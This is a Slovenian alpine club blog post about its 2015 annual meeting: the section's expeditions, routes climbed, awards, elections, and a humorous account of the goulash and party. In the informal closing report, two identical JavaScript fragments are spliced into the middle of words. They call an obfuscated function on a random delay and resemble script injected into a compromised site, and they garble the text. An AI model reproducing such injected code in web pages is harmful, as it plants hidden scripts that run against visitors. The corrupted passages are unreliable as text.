Občni zbor

Written by Marijan

January 9, 2016

Občni zbor Alpinističnega odseka PD Ajdovščina
(ali: kako smo letu 2015 pogledali v zobe)


Postali smo alpinistični odsek
Leto 2015 je bilo za ajdovski alpinizem v marsičem prelomno. Po dolgoletni organski rasti in vzgoji domačega kadra smo uspeli prerasti iz sekcije v polnokrvi alpinistični odsek utemeljen na široki in močni bazi, ki se ukvarja z vsemi vejami alpinizma. Dosežek za katerega gre zasluga več generacijam.

Odprava v Patagonijo
Načelnik Boštjan Mikuž je bil del primorske odprave v Patagonijo, kjer je bila v deviški steni Cerro san Lorenza splezana nova prvenstvena smer No Fiesta, ED+, 1600 m, 18 h, Dejan Koren (AO Vipava), Rok Kurinčič (Posoški AO) in Boštjan Mikuž (AO Ajdovščina).

Rekordno število splezanih smeri
Celoten odsek je v letu 2015 splezal rekordnih 390 smeri, od tega kar 9 prvenstvenih. Poudariti velja tudi močan dvig kvalitete vzponov.

Podelili smo nagrade za naj dosežke preteklega leta
Največ vzponov, kar 75 je nanizal Jure Ličen. Najbližje soncu sta bila Dean Strosar in Dominik Mikuž pri prečenju Mont Blanca. Najtežji vzpon je uspel Tinetu Andrejašiču, ki je z Deanom Korenom splezal  smer Čira Čara  (M8+, WI5+, 150m). V športnem plezanju smo prvič prebili mejo 8, za kar je zaslužen Vid Štrancar, ki je splezal Mašo sprave 8a. Podeljeni sta bili tudi dve nagradi za posebne dosežke. Prvo si je zaslužil Egon Pavlica za suvereno vrnitev po težki plezalni nesreči, drugo pa Simon Ušaj za pretečenih ultraških 100 milj Istre.

Izvedli smo volitve
Volitve niso prinesle pretresov. Dosedanja ekipa je glede na uspešne rezultate ohranila voljo za delo tudi v prihodnje. Načelnik tako ostaja še naprej Boštjan Mikuž, njegov namestnik je Egon Pavlica. Blagajniško/tajniško poslovanje je zaupano Simonu Ušaju. Ožbej Marc ostaja urednik Wajdovskih alpinističnih vesti (WAV), Matic Štrancar pa njegov pomočnik. Oblikovalsko mojstrstvo za spletno stran in WAV bo še naprej v rokah Marijana Močivnika.

Imeli smo kulturni program
Tine Premrl je predstavil plezanja po vseh kontinentih. Za enega od vrhuncev zbora pa je poskrbel Matic z Lozic Štrancar z njegovim osebnim pogledom na alpinizem. Kulturnemu programu je sledil kleni alpinistični žur. Vse obče prisotnih alpinistov, ljubiteljev in prijateljev z gornje vipavskih koncev se je v večeru in noči zvrstilo preko petdeset.

Interni dodatek 1
Poročilo za širšo javnost je vredno začiniti tudi z nekaterimi detajli namenjenimi udeleženi javnosti, ki rada zabija, v poke namreč. Kot vsaka dobra vojska ima tudi naš odsek zelo dobro razvito izvidniško in zaledno enoto. Obe enoti sta se kot predhodnica zbrali kmalu po 13:00 uri, čemerne meglene sobote,  v Taborniškem domu na Kovku. Misija ena sama – kuhanje alpinističnega golaža. Zadeva je morala zadoščati za 50 ljudi, zatorej so bile količine precejšnje. Že samo lupljenje čebule je nagnalo nekaj solz v oči, solza je bilo veliko tudi kasneje. Kuhanje je ob primernem stalnem okušanju ne samo golaža potekalo odlično do samega konca na kar je prišlo do grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande finala povezanega s količino ljute paprike. Do takrat je zadeva potekala odlično, paprika pa je dokazala, da je res ljuta in doprinesla k primerno začinjenemu golažu. Kmalu se je zbralo nekaj ducatov gonje vipavskega gorolezništva. Bilo nas je vseh vrst; od skaloljubcev, ledoljubcev, search&rescue do škijarjev in ljubiteljev prostega sloga pri osvajanju monte venerisa.

Sledil je uradni in kulturni program, kjer je načelnik z nekaj obotavljanja to ostal še naprej. Slavili smo kar 390 splezanih vzponov. Tine je predstavil zelo zanimivo predavanje o plezanjih po različnih kontinentih. Matic pa v njemu lastnem slogu navdušil tako žensko kot moško občinstvo s pogledom na alpinizem, ki je tisto nekaj več. S klikom na to povezavo je na ogled posebej za občni zbor pripravljena in tam premierno prikazana razburljiva filmska predstavitev predavatelja Matica.

Po uradnem delu je glavno vlogo prevzel DJ računalnik, stroboskop in prava disko kugla. Plesalo se je za vse vrste in okuse. Od ritmov, kjer sambo plešejo kreoli, do skandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andinavskega metala. Zadnji borci so odšli na kratek počitek ob sedmih zjutraj. Ob osmih smo namreč pogreli odličen golaž. Na koncu ga je od 30 litrov ostalo samo za eno dobro bibito. Po ribanju bajte smo nekateri po 24 urah odšli domov.

Ožbej

 

Categories

Archives

You May Also Like…

Občni zbor 2023

Občni zbor 2023

Še en občni zbor je za nami. Pregledali smo uspešno leto v 2022, številne uspešno izvedene skupne ture od smučanja iz...

0 Comments

Submit a Comment